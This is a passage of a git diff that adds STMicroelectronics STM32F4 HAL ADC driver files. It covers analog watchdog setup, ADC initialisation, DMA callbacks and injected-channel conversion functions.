AnalogWDGConfig) +{ +#ifdef USE_FULL_ASSERT + uint32_t tmp = 0U; +#endif /* USE_FULL_ASSERT */ + + /* Check the parameters */ + assert_param(IS_ADC_ANALOG_WATCHDOG(AnalogWDGConfig->WatchdogMode)); + assert_param(IS_ADC_CHANNEL(AnalogWDGConfig->Channel)); + assert_param(IS_FUNCTIONAL_STATE(AnalogWDGConfig->ITMode)); + +#ifdef USE_FULL_ASSERT + tmp = ADC_GET_RESOLUTION(hadc); + assert_param(IS_ADC_RANGE(tmp, AnalogWDGConfig->HighThreshold)); + assert_param(IS_ADC_RANGE(tmp, AnalogWDGConfig->LowThreshold)); +#endif /* USE_FULL_ASSERT */ + + /* Process locked */ + __HAL_LOCK(hadc); + + if(AnalogWDGConfig->ITMode == ENABLE) + { + /* Enable the ADC Analog watchdog interrupt */ + __HAL_ADC_ENABLE_IT(hadc, ADC_IT_AWD); + } + else + { + /* Disable the ADC Analog watchdog interrupt */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_AWD); + } + + /* Clear AWDEN, JAWDEN and AWDSGL bits */ + hadc->Instance->CR1 &= ~(ADC_CR1_AWDSGL | ADC_CR1_JAWDEN | ADC_CR1_AWDEN); + + /* Set the analog watchdog enable mode */ + hadc->Instance->CR1 |= AnalogWDGConfig->WatchdogMode; + + /* Set the high threshold */ + hadc->Instance->HTR = AnalogWDGConfig->HighThreshold; + + /* Set the low threshold */ + hadc->Instance->LTR = AnalogWDGConfig->LowThreshold; + + /* Clear the Analog watchdog channel select bits */ + hadc->Instance->CR1 &= ~ADC_CR1_AWDCH; + + /* Set the Analog watchdog channel */ + hadc->Instance->CR1 |= (uint32_t)((uint16_t)(AnalogWDGConfig->Channel)); + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup ADC_Exported_Functions_Group4 ADC Peripheral State functions + * @brief ADC Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State and errors functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Check the ADC state + (+) Check the ADC Error + +@endverbatim + * @{ + */ + +/** + * @brief return the ADC state + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL state + */ +uint32_t HAL_ADC_GetState(ADC_HandleTypeDef* hadc) +{ + /* Return ADC state */ + return hadc->State; +} + +/** + * @brief Return the ADC error code + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval ADC Error Code + */ +uint32_t HAL_ADC_GetError(ADC_HandleTypeDef *hadc) +{ + return hadc->ErrorCode; +} + +/** + * @} + */ + +/** @addtogroup ADC_Private_Functions + * @{ + */ + +/** + * @brief Initializes the ADCx peripheral according to the specified parameters + * in the ADC_InitStruct without initializing the ADC MSP. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +static void ADC_Init(ADC_HandleTypeDef* hadc) +{ + ADC_Common_TypeDef *tmpADC_Common; + + /* Set ADC parameters */ + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADCs and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Set the ADC clock prescaler */ + tmpADC_Common->CCR &= ~(ADC_CCR_ADCPRE); + tmpADC_Common->CCR |= hadc->Init.ClockPrescaler; + + /* Set ADC scan mode */ + hadc->Instance->CR1 &= ~(ADC_CR1_SCAN); + hadc->Instance->CR1 |= ADC_CR1_SCANCONV(hadc->Init.ScanConvMode); + + /* Set ADC resolution */ + hadc->Instance->CR1 &= ~(ADC_CR1_RES); + hadc->Instance->CR1 |= hadc->Init.Resolution; + + /* Set ADC data alignment */ + hadc->Instance->CR2 &= ~(ADC_CR2_ALIGN); + hadc->Instance->CR2 |= hadc->Init.DataAlign; + + /* Enable external trigger if trigger selection is different of software */ + /* start. */ + /* Note: This configuration keeps the hardware feature of parameter */ + /* ExternalTrigConvEdge "trigger edge none" equivalent to */ + /* software start. */ + if(hadc->Init.ExternalTrigConv != ADC_SOFTWARE_START) + { + /* Select external trigger to start conversion */ + hadc->Instance->CR2 &= ~(ADC_CR2_EXTSEL); + hadc->Instance->CR2 |= hadc->Init.ExternalTrigConv; + + /* Select external trigger polarity */ + hadc->Instance->CR2 &= ~(ADC_CR2_EXTEN); + hadc->Instance->CR2 |= hadc->Init.ExternalTrigConvEdge; + } + else + { + /* Reset the external trigger */ + hadc->Instance->CR2 &= ~(ADC_CR2_EXTSEL); + hadc->Instance->CR2 &= ~(ADC_CR2_EXTEN); + } + + /* Enable or disable ADC continuous conversion mode */ + hadc->Instance->CR2 &= ~(ADC_CR2_CONT); + hadc->Instance->CR2 |= ADC_CR2_CONTINUOUS((uint32_t)hadc->Init.ContinuousConvMode); + + if(hadc->Init.DiscontinuousConvMode != DISABLE) + { + assert_param(IS_ADC_REGULAR_DISC_NUMBER(hadc->Init.NbrOfDiscConversion)); + + /* Enable the selected ADC regular discontinuous mode */ + hadc->Instance->CR1 |= (uint32_t)ADC_CR1_DISCEN; + + /* Set the number of channels to be converted in discontinuous mode */ + hadc->Instance->CR1 &= ~(ADC_CR1_DISCNUM); + hadc->Instance->CR1 |= ADC_CR1_DISCONTINUOUS(hadc->Init.NbrOfDiscConversion); + } + else + { + /* Disable the selected ADC regular discontinuous mode */ + hadc->Instance->CR1 &= ~(ADC_CR1_DISCEN); + } + + /* Set ADC number of conversion */ + hadc->Instance->SQR1 &= ~(ADC_SQR1_L); + hadc->Instance->SQR1 |= ADC_SQR1(hadc->Init.NbrOfConversion); + + /* Enable or disable ADC DMA continuous request */ + hadc->Instance->CR2 &= ~(ADC_CR2_DDS); + hadc->Instance->CR2 |= ADC_CR2_DMAContReq((uint32_t)hadc->Init.DMAContinuousRequests); + + /* Enable or disable ADC end of conversion selection */ + hadc->Instance->CR2 &= ~(ADC_CR2_EOCS); + hadc->Instance->CR2 |= ADC_CR2_EOCSelection(hadc->Init.EOCSelection); +} + +/** + * @brief DMA transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void ADC_DMAConvCplt(DMA_HandleTypeDef *hdma) +{ + /* Retrieve ADC handle corresponding to current DMA handle */ + ADC_HandleTypeDef* hadc = ( ADC_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + /* Update state machine on conversion status if not in error state */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL | HAL_ADC_STATE_ERROR_DMA)) + { + /* Update ADC state machine */ + SET_BIT(hadc->State, HAL_ADC_STATE_REG_EOC); + + /* Determine whether any further conversion upcoming on group regular */ + /* by external trigger, continuous mode or scan sequence on going. */ + /* Note: On STM32F4, there is no independent flag of end of sequence. */ + /* The test of scan sequence on going is done either with scan */ + /* sequence disabled or with end of conversion flag set to */ + /* of end of sequence. */ + if(ADC_IS_SOFTWARE_START_REGULAR(hadc) && + (hadc->Init.ContinuousConvMode == DISABLE) && + (HAL_IS_BIT_CLR(hadc->Instance->SQR1, ADC_SQR1_L) || + HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_EOCS) ) ) + { + /* Disable ADC end of single conversion interrupt on group regular */ + /* Note: Overrun interrupt was enabled with EOC interrupt in */ + /* HAL_ADC_Start_IT(), but is not disabled here because can be used */ + /* by overrun IRQ process below. */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_EOC); + + /* Set ADC state */ + CLEAR_BIT(hadc->State, HAL_ADC_STATE_REG_BUSY); + + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + SET_BIT(hadc->State, HAL_ADC_STATE_READY); + } + } + + /* Conversion complete callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->ConvCpltCallback(hadc); +#else + HAL_ADC_ConvCpltCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + } + else /* DMA and-or internal error occurred */ + { + if ((hadc->State & HAL_ADC_STATE_ERROR_INTERNAL) != 0UL) + { + /* Call HAL ADC Error Callback function */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->ErrorCallback(hadc); +#else + HAL_ADC_ErrorCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + } + else + { + /* Call DMA error callback */ + hadc->DMA_Handle->XferErrorCallback(hdma); + } + } +} + +/** + * @brief DMA half transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void ADC_DMAHalfConvCplt(DMA_HandleTypeDef *hdma) +{ + ADC_HandleTypeDef* hadc = ( ADC_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + /* Half conversion callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->ConvHalfCpltCallback(hadc); +#else + HAL_ADC_ConvHalfCpltCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA error callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void ADC_DMAError(DMA_HandleTypeDef *hdma) +{ + ADC_HandleTypeDef* hadc = ( ADC_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + hadc->State= HAL_ADC_STATE_ERROR_DMA; + /* Set ADC error code to DMA error */ + hadc->ErrorCode |= HAL_ADC_ERROR_DMA; + /* Error callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->ErrorCallback(hadc); +#else + HAL_ADC_ErrorCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_ADC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_adc_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_adc_ex.c new file mode 100644 index 000000000..1b6ee8551 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_adc_ex.c @@ -0,0 +1,1115 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_adc_ex.c + * @author MCD Application Team + * @brief This file provides firmware functions to manage the following + * functionalities of the ADC extension peripheral: + * + Extended features functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#)Initialize the ADC low level resources by implementing the HAL_ADC_MspInit(): + (##) Enable the ADC interface clock using __HAL_RCC_ADC_CLK_ENABLE() + (##) ADC pins configuration + (+++) Enable the clock for the ADC GPIOs using the following function: + __HAL_RCC_GPIOx_CLK_ENABLE() + (+++) Configure these ADC pins in analog mode using HAL_GPIO_Init() + (##) In case of using interrupts (e.g. HAL_ADC_Start_IT()) + (+++) Configure the ADC interrupt priority using HAL_NVIC_SetPriority() + (+++) Enable the ADC IRQ handler using HAL_NVIC_EnableIRQ() + (+++) In ADC IRQ handler, call HAL_ADC_IRQHandler() + (##) In case of using DMA to control data transfer (e.g. HAL_ADC_Start_DMA()) + (+++) Enable the DMAx interface clock using __HAL_RCC_DMAx_CLK_ENABLE() + (+++) Configure and enable two DMA streams stream for managing data + transfer from peripheral to memory (output stream) + (+++) Associate the initialized DMA handle to the ADC DMA handle + using __HAL_LINKDMA() + (+++) Configure the priority and enable the NVIC for the transfer complete + interrupt on the two DMA Streams. The output stream should have higher + priority than the input stream. + (#) Configure the ADC Prescaler, conversion resolution and data alignment + using the HAL_ADC_Init() function. + + (#) Configure the ADC Injected channels group features, use HAL_ADC_Init() + and HAL_ADC_ConfigChannel() functions. + + (#) Three operation modes are available within this driver: + + *** Polling mode IO operation *** + ================================= + [..] + (+) Start the ADC peripheral using HAL_ADCEx_InjectedStart() + (+) Wait for end of conversion using HAL_ADC_PollForConversion(), at this stage + user can specify the value of timeout according to his end application + (+) To read the ADC converted values, use the HAL_ADCEx_InjectedGetValue() function. + (+) Stop the ADC peripheral using HAL_ADCEx_InjectedStop() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Start the ADC peripheral using HAL_ADCEx_InjectedStart_IT() + (+) Use HAL_ADC_IRQHandler() called under ADC_IRQHandler() Interrupt subroutine + (+) At ADC end of conversion HAL_ADCEx_InjectedConvCpltCallback() function is executed and user can + add his own code by customization of function pointer HAL_ADCEx_InjectedConvCpltCallback + (+) In case of ADC Error, HAL_ADCEx_InjectedErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_ADCEx_InjectedErrorCallback + (+) Stop the ADC peripheral using HAL_ADCEx_InjectedStop_IT() + + *** Multi mode ADCs Regular channels configuration *** + ====================================================== + [..] + (+) Select the Multi mode ADC regular channels features (dual or triple mode) + and configure the DMA mode using HAL_ADCEx_MultiModeConfigChannel() functions. + (+) Start the ADC peripheral using HAL_ADCEx_MultiModeStart_DMA(), at this stage the user specify the length + of data to be transferred at each end of conversion + (+) Read the ADCs converted values using the HAL_ADCEx_MultiModeGetValue() function. + + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup ADCEx ADCEx + * @brief ADC Extended driver modules + * @{ + */ + +#ifdef HAL_ADC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @addtogroup ADCEx_Private_Functions + * @{ + */ +/* Private function prototypes -----------------------------------------------*/ +static void ADC_MultiModeDMAConvCplt(DMA_HandleTypeDef *hdma); +static void ADC_MultiModeDMAError(DMA_HandleTypeDef *hdma); +static void ADC_MultiModeDMAHalfConvCplt(DMA_HandleTypeDef *hdma); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup ADCEx_Exported_Functions ADC Exported Functions + * @{ + */ + +/** @defgroup ADCEx_Exported_Functions_Group1 Extended features functions + * @brief Extended features functions + * +@verbatim + =============================================================================== + ##### Extended features functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Start conversion of injected channel. + (+) Stop conversion of injected channel. + (+) Start multimode and enable DMA transfer. + (+) Stop multimode and disable DMA transfer. + (+) Get result of injected channel conversion. + (+) Get result of multimode conversion. + (+) Configure injected channels. + (+) Configure multimode. + +@endverbatim + * @{ + */ + +/** + * @brief Enables the selected ADC software start conversion of the injected channels. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADCEx_InjectedStart(ADC_HandleTypeDef* hadc) +{ + __IO uint32_t counter = 0U; + uint32_t tmp1 = 0U, tmp2 = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Enable the ADC peripheral */ + + /* Check if ADC peripheral is disabled in order to enable it and wait during + Tstab time the ADC's stabilization */ + if((hadc->Instance->CR2 & ADC_CR2_ADON) != ADC_CR2_ADON) + { + /* Enable the Peripheral */ + __HAL_ADC_ENABLE(hadc); + + /* Delay for ADC stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_STAB_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + + /* Start conversion if ADC is effectively enabled */ + if(HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + /* - Clear state bitfield related to injected group conversion results */ + /* - Set state bitfield related to injected operation */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_READY | HAL_ADC_STATE_INJ_EOC, + HAL_ADC_STATE_INJ_BUSY); + + /* Check if a regular conversion is ongoing */ + /* Note: On this device, there is no ADC error code fields related to */ + /* conversions on group injected only. In case of conversion on */ + /* going on group regular, no error code is reset. */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_REG_BUSY)) + { + /* Reset ADC all error code fields */ + ADC_CLEAR_ERRORCODE(hadc); + } + + /* Process unlocked */ + /* Unlock before starting ADC conversions: in case of potential */ + /* interruption, to let the process to ADC IRQ Handler. */ + __HAL_UNLOCK(hadc); + + /* Clear injected group conversion flag */ + /* (To ensure of no unknown state from potential previous ADC operations) */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_JEOC); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Check if Multimode enabled */ + if(HAL_IS_BIT_CLR(tmpADC_Common->CCR, ADC_CCR_MULTI)) + { + tmp1 = HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_JEXTEN); + tmp2 = HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO); + if(tmp1 && tmp2) + { + /* Enable the selected ADC software conversion for injected group */ + hadc->Instance->CR2 |= ADC_CR2_JSWSTART; + } + } + else + { + tmp1 = HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_JEXTEN); + tmp2 = HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO); + if((hadc->Instance == ADC1) && tmp1 && tmp2) + { + /* Enable the selected ADC software conversion for injected group */ + hadc->Instance->CR2 |= ADC_CR2_JSWSTART; + } + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL); + + /* Set ADC error code to ADC IP internal error */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_INTERNAL); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Enables the interrupt and starts ADC conversion of injected channels. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_ADCEx_InjectedStart_IT(ADC_HandleTypeDef* hadc) +{ + __IO uint32_t counter = 0U; + uint32_t tmp1 = 0U, tmp2 = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Enable the ADC peripheral */ + + /* Check if ADC peripheral is disabled in order to enable it and wait during + Tstab time the ADC's stabilization */ + if((hadc->Instance->CR2 & ADC_CR2_ADON) != ADC_CR2_ADON) + { + /* Enable the Peripheral */ + __HAL_ADC_ENABLE(hadc); + + /* Delay for ADC stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_STAB_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + + /* Start conversion if ADC is effectively enabled */ + if(HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + /* - Clear state bitfield related to injected group conversion results */ + /* - Set state bitfield related to injected operation */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_READY | HAL_ADC_STATE_INJ_EOC, + HAL_ADC_STATE_INJ_BUSY); + + /* Check if a regular conversion is ongoing */ + /* Note: On this device, there is no ADC error code fields related to */ + /* conversions on group injected only. In case of conversion on */ + /* going on group regular, no error code is reset. */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_REG_BUSY)) + { + /* Reset ADC all error code fields */ + ADC_CLEAR_ERRORCODE(hadc); + } + + /* Process unlocked */ + /* Unlock before starting ADC conversions: in case of potential */ + /* interruption, to let the process to ADC IRQ Handler. */ + __HAL_UNLOCK(hadc); + + /* Clear injected group conversion flag */ + /* (To ensure of no unknown state from potential previous ADC operations) */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_JEOC); + + /* Enable end of conversion interrupt for injected channels */ + __HAL_ADC_ENABLE_IT(hadc, ADC_IT_JEOC); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Check if Multimode enabled */ + if(HAL_IS_BIT_CLR(tmpADC_Common->CCR, ADC_CCR_MULTI)) + { + tmp1 = HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_JEXTEN); + tmp2 = HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO); + if(tmp1 && tmp2) + { + /* Enable the selected ADC software conversion for injected group */ + hadc->Instance->CR2 |= ADC_CR2_JSWSTART; + } + } + else + { + tmp1 = HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_JEXTEN); + tmp2 = HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO); + if((hadc->Instance == ADC1) && tmp1 && tmp2) + { + /* Enable the selected ADC software conversion for injected group */ + hadc->Instance->CR2 |= ADC_CR2_JSWSTART; + } + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL); + + /* Set ADC error code to ADC IP internal error */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_INTERNAL); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop conversion of injected channels. Disable ADC peripheral if + * no regular conversion is on going. + * @note If ADC must be disabled and if conversion is on going on + * regular group, function HAL_ADC_Stop must be used to stop both + * injected and regular groups, and disable the ADC. + * @note If injected group mode auto-injection is enabled, + * function HAL_ADC_Stop must be used. + * @note In case of auto-injection mode, HAL_ADC_Stop must be used. + * @param hadc ADC handle + * @retval None + */ +HAL_StatusTypeDef HAL_ADCEx_InjectedStop(ADC_HandleTypeDef* hadc) +{ + HAL_StatusTypeDef tmp_hal_status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Stop potential conversion and disable ADC peripheral */ + /* Conditioned to: */ + /* - No conversion on the other group (regular group) is intended to */ + /* continue (injected and regular groups stop conversion and ADC disable */ + /* are common) */ + /* - In case of auto-injection mode, HAL_ADC_Stop must be used. */ + if(((hadc->State & HAL_ADC_STATE_REG_BUSY) == RESET) && + HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO) ) + { + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Check if ADC is effectively disabled */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_READY); + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_CONFIG); + + tmp_hal_status = HAL_ERROR; + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return tmp_hal_status; +} + +/** + * @brief Poll for injected conversion complete + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param Timeout Timeout value in millisecond. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADCEx_InjectedPollForConversion(ADC_HandleTypeDef* hadc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check End of conversion flag */ + while(!(__HAL_ADC_GET_FLAG(hadc, ADC_FLAG_JEOC))) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + /* New check to avoid false timeout detection in case of preemption */ + if(!(__HAL_ADC_GET_FLAG(hadc, ADC_FLAG_JEOC))) + { + hadc->State= HAL_ADC_STATE_TIMEOUT; + /* Process unlocked */ + __HAL_UNLOCK(hadc); + return HAL_TIMEOUT; + } + } + } + } + + /* Clear injected group conversion flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_JSTRT | ADC_FLAG_JEOC); + + /* Update ADC state machine */ + SET_BIT(hadc->State, HAL_ADC_STATE_INJ_EOC); + + /* Determine whether any further conversion upcoming on group injected */ + /* by external trigger, continuous mode or scan sequence on going. */ + /* Note: On STM32F4, there is no independent flag of end of sequence. */ + /* The test of scan sequence on going is done either with scan */ + /* sequence disabled or with end of conversion flag set to */ + /* of end of sequence. */ + if(ADC_IS_SOFTWARE_START_INJECTED(hadc) && + (HAL_IS_BIT_CLR(hadc->Instance->JSQR, ADC_JSQR_JL) || + HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_EOCS) ) && + (HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO) && + (ADC_IS_SOFTWARE_START_REGULAR(hadc) && + (hadc->Init.ContinuousConvMode == DISABLE) ) ) ) + { + /* Set ADC state */ + CLEAR_BIT(hadc->State, HAL_ADC_STATE_INJ_BUSY); + + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_REG_BUSY)) + { + SET_BIT(hadc->State, HAL_ADC_STATE_READY); + } + } + + /* Return ADC state */ + return HAL_OK; +} + +/** + * @brief Stop conversion of injected channels, disable interruption of + * end-of-conversion. Disable ADC peripheral if no regular conversion + * is on going. + * @note If ADC must be disabled and if conversion is on going on + * regular group, function HAL_ADC_Stop must be used to stop both + * injected and regular groups, and disable the ADC. + * @note If injected group mode auto-injection is enabled, + * function HAL_ADC_Stop must be used. + * @param hadc ADC handle + * @retval None + */ +HAL_StatusTypeDef HAL_ADCEx_InjectedStop_IT(ADC_HandleTypeDef* hadc) +{ + HAL_StatusTypeDef tmp_hal_status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Stop potential conversion and disable ADC peripheral */ + /* Conditioned to: */ + /* - No conversion on the other group (regular group) is intended to */ + /* continue (injected and regular groups stop conversion and ADC disable */ + /* are common) */ + /* - In case of auto-injection mode, HAL_ADC_Stop must be used. */ + if(((hadc->State & HAL_ADC_STATE_REG_BUSY) == RESET) && + HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO) ) + { + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Check if ADC is effectively disabled */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Disable ADC end of conversion interrupt for injected channels */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_JEOC); + + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_READY); + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_CONFIG); + + tmp_hal_status = HAL_ERROR; + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return tmp_hal_status; +} + +/** + * @brief Gets the converted value from data register of injected channel. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param InjectedRank the ADC injected rank. + * This parameter can be one of the following values: + * @arg ADC_INJECTED_RANK_1: Injected Channel1 selected + * @arg ADC_INJECTED_RANK_2: Injected Channel2 selected + * @arg ADC_INJECTED_RANK_3: Injected Channel3 selected + * @arg ADC_INJECTED_RANK_4: Injected Channel4 selected + * @retval None + */ +uint32_t HAL_ADCEx_InjectedGetValue(ADC_HandleTypeDef* hadc, uint32_t InjectedRank) +{ + __IO uint32_t tmp = 0U; + + /* Check the parameters */ + assert_param(IS_ADC_INJECTED_RANK(InjectedRank)); + + /* Clear injected group conversion flag to have similar behaviour as */ + /* regular group: reading data register also clears end of conversion flag. */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_JEOC); + + /* Return the selected ADC converted value */ + switch(InjectedRank) + { + case ADC_INJECTED_RANK_4: + { + tmp = hadc->Instance->JDR4; + } + break; + case ADC_INJECTED_RANK_3: + { + tmp = hadc->Instance->JDR3; + } + break; + case ADC_INJECTED_RANK_2: + { + tmp = hadc->Instance->JDR2; + } + break; + case ADC_INJECTED_RANK_1: + { + tmp = hadc->Instance->JDR1; + } + break; + default: + break; + } + return tmp; +} + +/** + * @brief Enables ADC DMA request after last transfer (Multi-ADC mode) and enables ADC peripheral + * + * @note Caution: This function must be used only with the ADC master. + * + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param pData Pointer to buffer in which transferred from ADC peripheral to memory will be stored. + * @param Length The length of data to be transferred from ADC peripheral to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADCEx_MultiModeStart_DMA(ADC_HandleTypeDef* hadc, uint32_t* pData, uint32_t Length) +{ + __IO uint32_t counter = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ContinuousConvMode)); + assert_param(IS_ADC_EXT_TRIG_EDGE(hadc->Init.ExternalTrigConvEdge)); + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.DMAContinuousRequests)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Check if 